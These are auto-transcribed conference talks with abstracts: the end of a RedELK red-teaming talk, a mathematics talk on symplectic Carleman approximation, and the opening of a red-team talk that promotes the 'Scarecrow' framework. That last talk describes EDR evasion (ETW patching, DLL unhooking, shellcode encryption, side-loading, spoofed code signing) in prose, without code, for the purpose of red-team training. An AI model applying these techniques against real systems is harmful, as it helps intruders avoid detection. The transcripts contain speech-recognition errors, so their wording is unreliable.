was a 19 i believe it's at it's still a better stage but almost there it's a major improvement both on the setup but majority on the types of alarms as well as the ups data and supported tech so lots of more c2 is supported partial to but also ng-next and their own c2 framework and of course like i mentioned we have the integrated neo4j and the jupyton on books it's in constant development more alarms more improved dashboards and things like that and we'll also working on other c2 frameworks and you're happy to join us if you like in summary we believe red teaming is to make blue teams better that's why we do proper sparring and we having that insight of movement of your opponent during sparring fight is actually better so head up helps you with that specific case it will help you to see activities that the blue teams are doing and dear blue think of your upset you can make use of red dog you will find it on a get-up and you will find information about this also on a blog and with that i would like to thank you for your time
Blue teams and CERTs are increasingly better equipped and better trained. At the same time offensive infrastructures are increasingly diverse in components and growing in size. This makes it a lot harder for red teams to keep oversight but also a lot easier for blue teams to react on the traces that red teams leave behind. However, do blue teams really know what traces _they_ leave behind when doing their investigation and analyses? RedELK was created and open sourced to help red teams with these two goals: 1) make it easy to have operational oversight, 2) abuse blue team OPSEC failures. Come to this talk to learn about blue team detection and how RedELK can help you.
10.5446/54148 (DOI)
Thanks to the organizers for inviting me. Yes, so I'm going to talk about Simplectic Carleman approximation on joint orbits. The starting point is a question asked by Nassim, that if you take a smooth, C infinity smooth, Simplectomorphism on R2N, R2N sits inside C2N, then the question is if this is a proximal in the sense of Carleman by elements of this holomorphic Simplectic group leaving R2N invariant. And of course Simplectic on R2 just means that phi preserves this Simplectic form and then the analog thing for the holomorphic in the holomorphic case. And then what does this Carleman approximation mean? This means that for any continuous function on R2N, strictly positive, there should exist a holomorphic real Simplectomorphism of C2N so that this psi approximates phi to precision epsilon of x for x on R2N. So now the point is that this is much more than uniform approximation or even approximation on compacts so this epsilon could go to zero as fast as you want as x goes to infinity. And if you can also, we will do that later, throw in some derivatives here you want to approximate. So anyhow I thought I'd just start by, before I start discussing this, just go through a little bit of the history of Carleman approximation for functions in case many of you didn't see that before. So a little history, so this is not Carleman approximation but something maybe all of you know that Weierstrass proved that any continuous function on an interval AB is uniformly approximable by polynomials. So the Junger theorem tells you if K is a compact set with C minus K connected then any function F holomorphic on K, so this means holomorphic on a neighborhood of K, maybe approximated by polynomials. And then comes this Carleman theorem which is a generalization of Weierstrass telling that you can replace the closed interval by the real line. And then there is the corresponding statement that I had before, any continuous function on the entire real line can be approximated to precision epsilon of x where x is a continuous function. So maybe such a theorem is a bit surprising if you did not see it before but if you have a slight generalization of the two theorems above it's very easy to prove. So I thought I'll just give a short sketch for later. So well you need a combination theorem, a Marguer-Lian type theorem but you can just imagine if you have a ball, maybe say a disc of radius r in the complex plane and you consider the real line r and then I'm going to start with a continuous function F, it's holomorphic on this disc and continuous on the real line. So if you assume that you have a combination of those two theorems above, so just assume, see that there exists a sequence of polynomials approximating, converging to F on this closed disc union and let's say the closed disc of radius r plus 2, disc intersected r. So I assume that I can approximate this given function on that disc, union such an interval then you can just, you take a cutoff function which is 0 on the neighborhood of the disc of radius r plus 1 then it dies when you come out of the disc of radius r plus 2, you choose such a cutoff function, then you just write the Hj is Gj plus cutoff function, what do you want F minus Gj and this function is going to converge to F uniformly on the real line and it approximates the original F on this disc and it's holomorphic on a disc of radius r plus 1. So now you can imagine you just put this into an inductive procedure and you get this approximation result here. So this was just to emphasize that when we deal with this kind of thing, there are two things. So one thing is you have to prove a local theorem compact result and then you need some inductive procedure to go to a limit. Okay, anyhow, so just keep that in mind for later. This was Kalman, more generally it's proved by these guys that, so this is a complete characterization that the closed subset X in a complex plane satisfies Kalman approximation if and only if it has no interior and the complement is connected and locally connected at infinity. Alright, so that's one complex variable. A little bit closer to our case, Rn inside Cn satisfies Kalman approximation and the proof is just not very much harder than this. It's quite simple. Moving away from flat things, it's known that the smooth unbounded curve always admits such approximation and a bit more generally these local rectifiable curves. However, moving up to higher dimensional submanifolds, things now change in several complex variables because there are polynomially convex totally real submanifolds which do not admit Kalman approximation. So these, of course, admits approximation on compact sets can be exhausted by polynomially convex set but there is some global business going on that prevents this Kalman approximation to hold. And of course what, well, maybe not of course, but if you go back to this Kelditsch-Lavrentief characterization you see that they require, it's necessary that the complement is locally connected at infinity and somehow this is, well, that's not correct to say, but that's what goes wrong in this case except that locally connected at infinity doesn't make sense in this setting so you have to reformulate and if you reformulate what that means you can characterize completely totally real submanifolds of CN which admit Kalman approximation. So they have to be polynomially convex and I'm not going to explain this, have something called bounded exhaustion holes. But this is certainly something that holds for Rn in CN and in particular R2n into in C2n. All right, moving to holomorphic maps, it's known that a proper smooth embedding from R to C2 can be approximated in the sense of Kalman by proper holomorphic embeddings of the complex plane itself and it is known and this is a little bit closer to what we are going to discuss today that if you are in CN and you look at, so I'm not going to be too precise, so I choose K strictly less than N and I'm going to assume that I have a totally real manifold that's sort of, let's say just tangentially equal to this so it doesn't matter what it looks like down here but it should look like Rk near infinity then if you choose, so this is a bit maybe unfortunate language if you choose a smooth embedding of this M which is the identity on M outside a compact set then you can approximate it in this Kalman sense by holomorphic automorphisms of CN. All right and then finally, finally the result today, so this is joint work with Fuxiang Deng precisely it's a positive answer to the question that we started with you take a simplectomorphism of R2N you let epsilon of X be a strictly positive function continuous and fix an integer K then you can Kalman approximate by holomorphic simplectomorphisms also derivatives up to order K. All right so this is very different so and the requirement that R2N is left invariant right so this is a little bit different from this situation here so here we assume it's necessary to assume that K is less than N here it's not it's exactly the same number right so here 2N is the K so the totally real guy here has maximal dimension and you want to leave it invariant this is not what we want to do here. All right so this is the main theorem but this is sort of a special case over more general result so you can produce many more like totally real submanifolds of complex symplectic manifolds for which such theorems hold so I'm going to start by just describing a just more general setup. Sorry. Yes, yes, yes, yes, I don't think you can. This is the order of derivative. I think if you specify K first you could say that phi has to be CK plus something you are going to lose some derivatives. All right so in the title I had coadjoint orbits so I'm going to say something about that so I'm going to start with a Lie group and I look at the tangent space of the group then if you fix an element of the Lie group you have a conjugation map so this is just standard things this conjugation map fixes the identity right which means that it's differential acts on the tangent space at identity right and that differential is called the adjoint action of G on the group. All right so you want coadjoint action so now you want an action on the dual space on the cotangent space and then you just define by duality so you said that add star that's the coadjoint action at the point G no applied to G acting on a cotangent is just defined by take the adjoint action of the inverse and let the cotangent act on that. All right so then you get an action on the dual space on the cotangent space. And as soon as you fix so you fix such a such a psi and then you take like G act on your the whole group G act on your cotangent space you get an orbit so that's a smooth sub manifold of the cotangent space not necessarily closed but I'm going to assume I'm only going to consider closed ones in this talk. And what does this have to do with then the question if we look at an example you look at the Lie group so let's say a real Lie group consisting of matrices like this this you identify with R3 tangent space you identify with R3 and if you just compute what this coadjoint action is it's given by this. So for a and b this is the coadjoint action and you see that C is gone there is no C and then you also see that if you fix X3 then this orbit is just going to be an R2 if you vary b and a in R2 so you just get the flat R2 sitting inside of sitting inside of R3. So that's the coadjoint orbit R2 and if you just complexify this group you just throw in complex coefficients instead then you get the coadjoint orbit which is just the complexification of that R2 so R2 just sits inside C2 and that's the special case that we considered before R2 well in the N is 1 that R2 sits inside C2 and we do want to do approximation. But at this point we did not introduce there is no symplectic structure here yet so what do you do so let's see how do we get some vector fields on I want to define some vector fields on my coadjoint orbit and then I want to define a symplectic form afterwards so if you take a V in the tangent space you can consider the exponent map e to the Tv so you can take the adjoint coadjoint action of the exponential map you can apply it to a point in the dual space right. So then this one parameter family for T0 you start on your point xi and then you just flow inside your coadjoint orbit and so if you differentiate you get a vector field right so I just take d dt oh now it jumped at T equals 0 you get you get you get a vector field and it's complete you can note for later it's defined by differentiating a flow right so this is a complete smooth vector field if we look at real coadjoint orbit or holomorphic if we look at the complex one. All right so and this is also important for later that now we have lots of complete whole smooth or holomorphic vector fields on our coadjoint orbits by differentiating these flows all right and yeah this is a complete whole vector field then for two vector fields you want to define the symplectic form you just at the point xi then you take the Lie bracket of the two generators for the vector field so that's a new tangent vector and then the coad tangent can act on this bracket okay and then of course there is something to prove that this is a symplectic form but it is a symplectic form I'm not going to prove that but that's that's a standard standard thing and it's the fact that this vector field that we have above is Hamiltonian okay so it satisfies this contract xv with omega it's cost okay so this is symplectic vector field. All right but now comes the important thing for us is that you can also I mean if you want to define a symplectic or a Hamiltonian vector field you can do that by using potentials yeah you take a smooth function f on your whatever space symplectic manifold and if you find you can find at least no you can find the vector field x just satisfies df is the contraction of omega with x then x is a symplectic vector field with potential f okay and now comes the important thing here that this I think I have it on the next slide that I can say so this complete vector field has a potential and the potential is v okay so v is something in the tangent space it can act on the cotangent space so it's a function it could be a or you can use it as a potential and what happens is that you just get that vector field back okay so this is the important thing that all that all linear maps on your coad joint orbit are potentials for complete vector fields okay so this is the important thing this is the important thing so now yes so now I'm just going to forget a little bit this so what we are going to do we are going to look at this real coad joint orbits similar to the Heisenberg group sitting inside of complex coad joint orbits as closed sub manifolds and we have this property here so I'm just going to forget the orbits and just formulate just a general framework which is quite simple so I'm just going to say okay let's say we are in CN is RN plus IRN I'm just going to assume I have a closed sub manifold and I'm going to intersect it with RN and get a smooth closed manifold with the corresponding real dimension equal to the maximal real dimension inside Z I'm going to assume I have a symplectic form on my complex manifold so that when I restrict to the real guy I get the real symplectic form and I'm going to assume that whenever I take a linear map on CN and I use it as a potential for a Hamiltonian vector field on Z then that vector field is complete okay so those were the crucial facts for the coad joint orbits that we had before and this is certainly the case for R2N sitting inside of C2N okay all right all right so let's see this is going a bit faster than I thought let's try to look at this approximation of symplectic, symplectomorphism on the real center here and then as I said here so there are two things you have to do you need to prove some local approximation statement something on compacts and then you need some inductive scheme to build a global object as an inductive limit okay and somehow this induction scheme here gets a little bit complicated it's a little bit messy so I'm just going to stick I'm gonna just explain the compact the compact approximation and then well maybe we can indicate indicate later okay so what do we do so I'm going to consider ah so now I have to make some assumption so if if so if I am on R2N and I have a symplectomorphism phi and if it fixes the origin I can put phi T of x is 1 over T phi of Tx so this is an isotope an isotope of symplectomorphisms so that when T is 0 you have the identity map and when T is 1 you have your original phi okay so any symplectic diffeomorphism on R2N is in the C infinity path connected component of the identity okay so this is packed on R2N and if I work in this this abstract setting I just have to assume that I start with a symplectomorphism which is in the path connected component of the identity so that just has to be an assumption so then we take this this phi T so then you can interpret phi T as the flow of this time dependent vector field you just differentiate with respect to T right so now your goal is to approximate approximate the flow of a time dependent vector field so now it lives on your lives on your real coadjoint orbit assume or real z0 then it's a standard thing that if you just divide your time interval into many many many many small intervals and you just fix the time at the end point so these small intervals and you consider the flows of the time independent vector fields you can approximate the flow of this by just composing by composing flows of time independent vector so that's a standard thing so now you can forget about the time and ask to approximate the time independent vector field here alright so now x is time independent Hamiltonian so now I have to make another assumption and that is that and that is that my z0 is simply connected because then I can find the potential so the smooth vector field x has a potential f come that potential can be approximated by real holomorphic polynomials p of z so just holomorphic polynomials with real coefficients since this is e0 6 inside our end okay so now the points now I have now I have a real holomorphic polynomial p of z and since it's real if I use the new the polynomial as a potential for a new for a new vector field it is going to be tangent to the real z0 since it's real so I'm going to get the holomorphic vector field on the big complex manifold but it's going to be tangent along this real guy real center alright so now I have a polynomial now it's a standard thing that any polynomial in a number of variables can be written as a one variable polynomial in linear forms on well Rn or Cn okay so lambda jz is just a linear map linear linear map from the CN okay so this you can do now you are going to use the assumption so I assumed that if you if you forget the power mj and just use the linear guy lambda xj as a potential then you get something complete that was that was the assumption which we had automatically for this coad joint orbits but this means that this lambda j if you lose use the lambda j to the mj is still complete okay because the lambda if you look at the vector fields you get from the lambda j this lambda j to the mj is going to be constant on the level on the flow curves so this is still going to be complete so now if you use p I mean you use each each component here of p as a potential right individually what you did was you wrote wrote x as a sum of complete holomorphic vector fields and they come from real polynomials so they are tangent to to z0 and then you are done approximating on a compact set because it's a standard thing that if you have a sum of holomorphic no smooth or holomorphic for that matter if you have a sum of vector fields and you want to approximate the flow then you can flow along the individual vector fields for small amounts of time and compose like this here so when n goes to infinity you are approximating Phi t and each of the individual each of the individual components here are simplectic diffeomorphisms because they are time t over n flows of complete vector fields alright so this means yes I'm not really gonna so this means so you start with something z not it sits inside some larger complex manifold z and you have to choose so a compact we have the diffeomorphism Phi choose compact set k 1 and what we achieved was approximating this Phi on this particular compact case but this Phi is going to do something arbitrary outside here right so this means that let's see so now it had maybe a psi 1 or something so this is not really good you have to correct it so you have to do something like considering okay now you rather want psi 1 inverse composed with Phi because if you compose this with this you're back in business so now you try to approximate this and then correct your original approximation and then you try to set up inductive scheme to exhaust all of the not but of course you have to take care that your sequence of maps also converges to a diffeomorphism of C to N and that makes it a little bit tricky but that's basically the idea and I think actually that I am done so thank you.
For a complex Lie group G with a real form G0⊂G, we prove that any Hamiltionian automorphism ϕ of a coadjoint orbit O0 of G0 whose connected components are simply connected, may be approximated by holomorphic O0-invariant symplectic automorphism of the corresponding coadjoint orbit of G in the sense of Carleman, provided that O is closed. In the course of the proof, we establish the Hamiltonian density property for closed coadjoint orbits of all complex Lie groups.
10.5446/54347 (DOI)
Hello and welcome to my talk Operation by path catch my payload if you can My name is Matthew. I'm a technical manager and an octave Under the adversarial services. I have primarily a lead there that my role is focusing primarily on red teaming purple teaming Basically any type of adversarial real nation-state based attacks. I've also authored numerous open source tools and frameworks A lot of the research I've done It's been focused on evasion bypasses and as well as circumventing EDR and other endpoint based controls and security And the Microsoft Hall of Famer related to several disclosed Microsoft comm bypasses and I've spoken at numerous places including Def cons red team village derby con b-size Las Vegas your con RSA So just a brief overview of The agenda that we're going to cover today first we're going to understand the level of detection and look at some upset considerations and understand some TTPs for the modern era then we'll focus in on using scarecrow a framework for bypassing endpoint detection tools and then kind of drilling more into the indicators of compromise that Can lead to a detection or any type of artifacts when we're talking about command and control services and then introduce a new tool to help with those C2 profiles So to begin I mean this is a fairly you know common diagram to kind of depict the red team lifecycle Primarily we're really going to focus in today once again on the C2 and all the aspects of it from Establishing that's present to making sure you don't get detected and to your long-term longevity that leads into eventually post-ex techniques But first let's kind of define you know endpoint detection and response tools How do they actually detect us and you know subsequently prevent our attacks? Well, they primarily rely on a series of different combinations these days userland hooking being the most common Colonel callbacks using ETW events or the moniker of machine learning AI which I use that in quotes because a lot of times when we get down to it. It's usually a signature base or a combination of the three With something else in the background Not to dispute that there is any value to machine learning AI which just oftentimes when We see this as a tool to prevent threats. It's usually something that is really Not selling the whole truth and so there are a lot of misconceptions to it So With that in mind, how do we get around it? Well, the most common things have been process injection But with more recent events in the modern, you know, landscape going to things such as using custom system calls Using a technique called block DLOs, which we'll kind of go into in a little bit But also more and more undocumented API calls now. I've kind of posted a link here for Good buddy of mine. He does amazing bit of research and he has a great project called alternative shellcode exec This really focuses on using alternative API calls and Colonel callbacks to basically execute shellcode that are not in the normal way and this kind of by nature allows us to circumvent the normal detections and therefore Establish a presence without being detected because these are alternative ways So EDRs and other tools are often not looking for these as a point to see if malicious activity is being used So block DLL this has been a very common and a great technique. This is essentially a technique where You can set your process to have a flag and this flag says hey only allow Microsoft signed DLLs Which means that only system level DLL such as NTVs Colonel Colonel 32 these ones that they're all the only ones that are allowed to be loaded into our process Which means frankly that any type of EDR product can't load their DLL into our process to then subsequently detect our activity So their response to our attacks They've started you getting their DLL signed by Microsoft. Yeah, so this is a very effective way So that allows them to basically still load in even with that flag Deploying as a feature whitelisting controls Rather than the traditional black listing but whitelisting where you block everything and only limit certain applications has been very effective as binary based attacks no longer work These whitelisting rules are often using hashes So it's really hard to imitate a legitimate hash say of CMD with your implant And other kind of controls XDR This is just you know endpoints detection tools way of gathering telemetry from different aspects rather than just the endpoint But looking at you know the network behavioral traffic What's egressing an activity between the host to determine? You know baseline of malicious or suspicious activity such as you know WMI exact calls or anything along the lines that would lead to Techniques that an attacker would do or things that are out of the norm for that user really heavily emphasizing the base lining of activity So Our response to their response So one of the things that you know I kind of preaches with this data into more and more people having their EDR DLL signed by Microsoft is just to avoid blocked DLLs as a whole especially for initial flittle but also for post-ex techniques There are a lot of great techniques that right now coming out of there as a replacement But this really kind of helps prevent us from kind of being detected as this flag of my only signed Microsoft DLLs Isn't really staying in the same place So when we're talking about trying to blend in that flag itself can sometimes stick out as a sore thumb Therefore kind of drawing more attention to our process than we actually want it With regards to whitelistly controls we'll kind of talk a lot more about this but you know avoiding using power process injection In favor of a technique called side loading and we're going to get into that later But with regards to XDR controls this is really where some of the interesting stuff about blocking or in memory patching of ETW events since ETW and other things like that Aren't organically built into the windows environment How these things work is when they're actually running They actually have to basically start running in the process So this is a really interesting question When they're actually running they actually have to basically start enabling the traffic and stuff So there's no additional resources that are loaded so by patching and terminating or tampering with them They don't send the right information therefore these controls don't really work And so this really comes down to the cat and mouse game and how do we get better And really really at the end of the day really has to come down to how are we getting that alert How are teams seeing us and it's sometimes not always the shellcode or the implants fault There is a lot of different phases that get to the point of that shellcode running That can often be the catalyst for the trigger and we really need to understand this chain of events In order to identify where we need to improve in our tradecraft So when we look at this the example or definition I like to run by is there's the delivery The loader and the implant. The delivery is the mechanism that you're going to get your loader onto the box Most commonly things like MSHTA, BITS admin, anything that allows you to download or pull from a remote or local resource Your code onto the desktop. So that's one area. The second area is the loader itself So whether it be a binary, a DLL, a Jscript file, what have you This is the file that contains your implant as well as whatever techniques you're going to introduce Whether it be anti-sandboxing, anything for unhooking DLLs or a decryption technique These are the things that happen inside this process before your actual implant will run I like to define the implant as the shellcode or in CobaltStrike it's the reflective DLL That runs in memory and that essentially is responsible for establishing that remote connection out So once we have these three things defined we need to understand what's detecting us So I like to break it down into two things. Behavioral, which is really coming down to EDRs So EDRs really like to focus in on that behavioral indicators I have the example up here of YSXL spawning CMD.exe. That's a behavioral thing But there's also signatureizing. As great as we look at it, signatureize based such as the historical antivirus agents That still comes into play when they're detecting things like large block strings of base 64 or shellcode But what is the harder thing to understand and often is more the more common reason that leads to an event Is actually coming from something like a human interaction, a SIM, or some kind of sock tool that's monitoring for events This can be something like files being dropped in a location such as temp and then a process spawning from a weird location To something even more abnormal such as an alert that says, hey we're seeing a lot of egress to a new destination And tracing it back, this is a conference room PC so why is it calling out at three in the morning? These are all taken from real life red team operations where there has been some kind of generated alert And the lessons here are really kind of some of them are really simple, tell more of a convincing story But other are more technical that you have to apply more advanced techniques to basically bypass that technical control So the detection, these are the most common gotchas that I mentioned, I like to break them down into four things to really focus in on when I'm developing an attack What is the command I'm executing? So obviously these days things like PowerShell or BitAdmin, they're very highly indicated There's been a lot of research, they're a very prominent LOL bin So by focusing and using that there's a high chance that there is some kind of rule or type of mechanism out there that's looking for the execution of it Now there are a couple things you can do to kind of obfuscate that and that's really where you have to understand what you're going up against As well as being mindful of the file type Obviously if you're downloading from some random location, a binary, just straight, there are going to be things that passes through web proxies So they have external control and they can see it, this large data stream And binaries have a universal header so it's easy to detect that So these are all things you have to be mindful of when you're setting up this attack chain Also for abnormal behavior, this one's a little harder to discern But what I like to say is that if you're going to start using commands, LOL bins, you have to understand who you are You have to do someone that is a standard user, or is your user someone that would probably use this and if a security team was looking at it, they wouldn't bat an eye So it's really about blending in and telling that story And finally, whitelisting controls So when I talk about whitelisting controls, we have to really understand what's there Oftentimes you have the greatest attack chain ever But if they block your ability to run something, you'll never know it, especially in a black-box situation, beacon may not come home, your implant, your C2 essentially won't fire and you don't know if that detection is So if I can leave you with one thing when we talk about detections, it's this Detections are really easy to trigger, but they can be impossible to understand unless you have the ability to look at the alert and understand what it's triggering on And sometimes that can only be done through life lessons and experience Now let's talk about an example, in a situation, we'll use Cobalt Strike C2 Let's say PowerShell scripted web delivery, so that would be a PowerShell script that remotely calls downloads, establishes a beacon And this happens, the beacon calls home several times before the operator even executes a command The first command they run is who am I, and all of a sudden the beacon stops calling home So right now let's kind of take a look and follow this flow So here we see the chain, we see that CMD was used to spawn PowerShell Something in PowerShell was executed and then who am I was the last process When we look into it, we see that first and foremost, the PowerShell script while it was an event They don't have enough information right here, they believe there's something malicious and there has characteristics So it's not confirmed, they still need more data, these EDR products don't want to jump to the gun or terminate because it can actually impact business So they need the right information because if they're terminating everything like that, it cannot be used in their environment No one's going to use their product, so they need more data points to make that decision The next alert, okay so now it's a bit more of a severity, they see there's a base64 encoded command and it appears to be malicious But there's not enough indicators right now for them to know what's going on because sometimes this could be a false positive And then the final one, we see a recon command, obviously who am I was used And with all of this combined, that's where this alert is, so we see this breakdown It wasn't necessarily that the scripted web delivery was the catalyst It was simply enough behavioral indicators had been tripped for something to occur So once again, oftentimes the implant, it cannot be the primary cause of the detection, it can sometimes be post-ex techniques And so when you are looking at this and you're establishing a photo, you have to be also mindful of, you know, just because you have this photo doesn't mean that you're free and clear They're often secondary controls that can trigger, that can lead to a preventative measure and a loss of a beacon So it's really important to understand, even if you're successful, how you are successful Are there still stuff? Are you fully flying blind? Do they have enough information? Is there something they're waiting for? Even if you're using the latest techniques, if you're using a very common, you know, catalyst, like a delivery command that's highly indicated, you can get caught really easily And thus those highly undetectable techniques will never really be triggered or used I like to call this fruit from a poison tree because if they're already onto you for the first initial call, once again, let's say PowerShell Everything subsequent is already suspect So going back to that event, I want to kind of say, who am I? It was just a tipping point. There was enough information from there because from the behavioral instance, who am I? Except the user's a recon and with everything in that tag chain, it was enough to discern and confirm that based on the fact that who am I was run, that the PowerShell activity was indeed malicious And why they did that? It might be a question. Why didn't they just instantly block PowerShell? Because PowerShell, as much as we use this, still has legitimate business uses for IT and administration So by completely terminating it doesn't actually really work. You need more points to make a decision I like to also call out here as an opposite consideration to avoid PowerShell at all costs Most of these days, C-Sharp tools pretty much cover the gambit of everything C-Sharp is highly flexible. It's easier to off-use skates, makes it harder for Luteans or even endpoint protection tools and anti-mower controls to detect this So if at all costs, avoid using PowerShell. Because it's highly indexed and indicators of compromise are clearly defined So some opposite considerations when we're building out these attack chains as well as our implants. So first and foremost, let's look at the implant itself So first, I always say encryption. Always use some sort of encryption. The higher and the stronger the encryption, the better Sometimes I have discussions and people ask, well, what about, you know, base64 or something along those lines? That's good, but it's by no means a replacement for encryption It's great to use a combination, especially when you're encrypting AES or something like that, the string. To base64 encode it makes it easier to store in your file Your loader. Now that being said, the next issue becomes avoiding the strings. This is often a common thing that Yara rules or any type of blue teams are looking for For something to write a rule or some kind of trigger on. So if they can find a static string or a value that's always going to be the same, they will use that as a catalyst to create their rule for detection This kind of plays away from the EDR perspective into those SIMS SOC, all that type of stuff So I always like to say, if you can make your loader as more fake as it can be. So each time you generate, it's always going to be different values The strings are going to be different sizes and everything like that. That just adds a level of entropy, making it harder to see. You can kind of see here If you see in this example of a Yara, you can see these ops and all these things. If these are static values, the answers are that when that triggers, there will be an alert Also, if you can, depending on how fluid your comfortability is, using uncommon languages is a great way to add a layer of obfuscation to your loaders The most common ones these days for tooling is C-sharp, C++, but looking at things like Golang, Rust, F-sharp can be very valuable as just a natural way of obfuscating So opsec considerations, we're talking about a loader. So this is where it becomes very much an art form and situational The key thing here is to understand your environment. What are you targeting? What controls do they have? Is there something that could just not execute in that environment for a specific reason? More so to the point, what are the products? Is it a thin client? Is it the endpoint that you're targeting? Is it a limited box? Everything like that If you're going to use some kind of calm agent or something like that, are those calm things that relate to outlook or word, they might not exist on the server So those are things you need to be mindful of. Other things can be the file name. If your file name stands out as something very suspicious, that's one major thing If it looks more like a program than it would be found in enterprise, that kind of makes it easier to tell that story once again to blend in As well as going deeper, looking at the metadata, the attributes you don't want, your home computer or your own personal name and the metadata And that all kind of stems down to how does it look on disk. If it's just a weird binary or something really weird sitting on the desktop On a laptop, someone's laptop, they might see this as well as where you're executing it from. If you're once again executing it from temp or app data, it might, it could be suspicious enough that it would warrant investigation I called this up before, but strings, Base64, large strings is a very easy way and Microsoft is becoming more adept into looking for files that have large Base64 strings By breaking them up, it makes it harder for them to discern that this is definitely something suspicious because there's this large string of code And as always, binaries. I don't mean to beat up on them a lot, but binaries are really easy to detect. That's why looking at, and we're going to talk about it right now Looking at new ways to basically load shellcode into memory. So, onto the tactics, techniques, procedures for this modern era, we talked about this a little bit, but side loading This is becoming more and more prevalent. Threat groups around the world are starting to use this technique more and more in favor of traditional things like binaries or even process injection attacks This technique is simply the act of loading your DLL into a program, a legitimate program of that in a malicious way So how this can be, you know, an example can be with CPL files where when they are executed, if you execute your malicious CPL file, it will spawn run DLL, which is responsible for the control panel CPLs are controlled panel applets. So when you execute that binary, that CPL, I should say, it will spawn a run DLL process and that process will then load if it has the proper export functions That CPL file into memory and execute it. So what does that look like? It looks like run DLL legitimate process is loading something in You see this a lot with, you know, Redserver32 as well with DLLs, but it basically circumvents, and a lot of times whitelisting controls, because these are native to the Windows operating system These are things that are allowed. These are part of the system. They're not selling foreign, so they're often whitelisted. There's many of them, different types of silos I just use run DLL and register as the most common ones out there But what's great about these is once they're loaded in, your loader way that drops any type of dropper that drops that DLL or CPL, whichever catalyst you're using You can remove it and clean it up. So that way the process is there. It's running in memory and how you got it onto disk, how you got everything set up can be cleaned away and it's very effective So now let's talk about Scarecrow. Scarecrow is a framework I developed that actually performs a lot of the kind of techniques we've been talking about. So first and foremost, using custom system calls, it actually will reload NTDLL, kernel base and kernel 32 flushing out the EDR userland hooks in it. So there won't be any hooks It also encrypts the shellcode in an AES format. It patches ETW so that way there's no telemetry and it actually goes a step further and uses an alternative way to execute shellcode that's not standard So everything we've just kind of talked about, it's built in this framework. What it also does is those loaders, those files, whether it be a binary, a DLL, a JSCRIP file It spoof the attributes of ones that are legitimately found on the Windows environments, ranging from cmd.exe, word.exe to livecrypto.dll. All these values as well as allows you the ability to valently code sign by actually spoofing the attributes of a domain for a code signing cert I've provided a link and I'll provide it at the end to the framework. But talking about the loaders, there are several different ones here and I've kind of listed them out. So primarily it still does use binaries. There is a place still in the world for binaries But the control, the DLL, the Excel, MS, EXAC, and WSCRIP, these are all techniques to side load. So we already kind of talked about control and DLL, but the DLL is very polymorphic. It can be used for anything. It just generates a DLL and you can use it with any type of attack or exploit Excel, it actually will create an Excel plugin, once again with valid attributes and a code signing cert, and then uses JSCRIP to actually spawn Excel in the background and load this plugin into memory in a side loading technique I recently added MSI EXAC. This creates an MSI EXAC process and loads once again that DLL into memory. In WSCRIP, it uses a technique called registration free com, which takes a manifest file and says, this manifest cell says, hey, you need to load this DLL into memory. And it provides the attributes, everything of what it needs to do. So we will look for that DLL, which is our malicious DLL, and then load it into memory. Now, because side loading has become so prevalent, and as again, you know, threat actors are using this in the wild more and more. So, EDRs are trying to combat this. So you can kind of see right here there was a malicious module loaded. They rank this as a high. But what are they actually looking at? Because this is a really hard thing to kind of detect and stop. So, you know, simply put, sometimes from my investigations, looking at it, when they are looking at it, they look for some abnormal module behavior occurring in the process. What does that mean? Sometimes it can be as simple as then two DLLs were loaded at the same time with the same name. Just by changing it, there's no trigger anymore. There's no alert. So it really comes down to that this technique is very valuable and really hard to detect. As such, Scarecrow does ensure that the DLL names that it does load in for WScript Excel, run DLL, control panels, they're not DLLs you're ever going to see in those processes. So this alert never will be triggered. So, I wanted to provide some tips using this framework. So the first one is the loader flag. This flag actually stipulates what type of loader you're going to make. So as we kind of talked about side loading loaders are way better than binary base loaders. This is simply because they can bypass whitelisting controls. If you don't fill this in, it will by default fill it in as binaries and that might break your success. So always ensure that you know what you're using. Don't just use the default. DLLs, like I said, they have their place. It's really versatile. So it can be used with pretty much any type of attack. If you have a Metasploit module or anything along those lines or maybe another exploit where it needs a DLL as a catalyst for your implant, this is where that feature really comes into play. The next one is the domain flag. This flag basically determines the domain you're going to use to spoof the code signing search. Now, if you do have a valid code signing, you can enter it along with the password and it will actually use that to validly code sign it. One thing and it's a very common thing that I get asked is, you know, sometimes it doesn't work. You can't reach out installed when trying to sign that sometimes because wherever you're creating your loader, it needs to be able to reach out to that domain. So if they're if you're coming from a host has no access to that domain name or the domain doesn't actually exist. That can be a problem. One of the things I always want to stress to people is that when you're actually choosing the domain never use the company's domain. Very few companies, unless they're a big tech company that actually has a code sign, they use software or anything like that. They're typically not going to have a code signing search and therefore they're typically not going to whitelist it in their own EDR products or across their enterprise. So I think the things that are more common in the enterprise, you know, you everyone has networks, which is everyone uses windows, everyone uses, you know, those are the things that are going to give you a higher success rate when you're picking a domain. Next thing is the delivery command. This is what we talked about. This is very, very, very dependent on what you're facing. Like I've been saying, you know, L a well bins are great. They also come with a high chance of detection. So they're double edged sword. The way I kind of tell people is that, you know, HGAs are good, but macros and calm objects, they're better. You know, everyone has there's always the once again that fluid depends on the environment. So the more information you get from your recon, everything like that will really tell you which one will work better. And that's never going to be that this one's always the best. It's always going to be this one is the best for this situation. And that situation can change client to client network to network enterprise and security sector security stack. You really want to then focus in on the user behavior. I like to always say, you know, Sally from accounting does not know how to use your tail. So if you're trying to pretend to be Sally, maybe certainly tells probably not the best thing for you to do. Maybe it might be a different way. And I mean, sometimes it can be as easy as if you have, you know, an RDP based access. It's next impossible for any product to detect, you know, a mouse and keyboard clicks. It's no way to just find that, you know, once again, this is Sally's clicks and keyboard actions versus my me as a malicious attacker. So when you're thinking about it, it really comes down to that story and what you have access to the more you have the better the story is. I also wanted to provide some sample, you know, commands to get, you know, the ideas going. So here we have the first one is just creating assigned binary with ETW bypassing. That's the first option. Second option is a J script. The J scripts are ones that are usually my favorite. They're my go to J script is really great to kind of get through those network controls and land on this environment. So you see right here with the domain flag and the loader set to control with dash oh. Then finally, the last one, W script. Now W script is my go to loader. I just with that manifest file, it's very powerful and really hard to detect, but it might not be yours. You might depending on once again in the situation, it might be something better of a different loader. Always keep that in mind when you're looking at these situations. So here we have a little example. We have our loader.js and it's going to spawn. And if you can see in the private bytes, you can see that value is going up because our DLL is being side loaded into the process. And once it's finished, we'll start executing will unhook all those DLLs then decode the shellcode using custom system calls. Once that happens, it will use a different way to execute giving us a remote shell. Here we can then enter commands without being detected. So now let's talk indicators of compromise. What are they simply put they are pieces of or artifacts that can help identify malicious activity. This can be related to attacks, post-ex techniques, data breaches, or even infectious malware that we drop on environments. As our attacks become more advanced in this age, IOCs are becoming more and more relied on to look for. This is that transition away from relying solely on anti-malware controller and EVR product to solely be your sole point, but that layered approach where you have a sim or a SOC analyzing all this stuff to ensure that 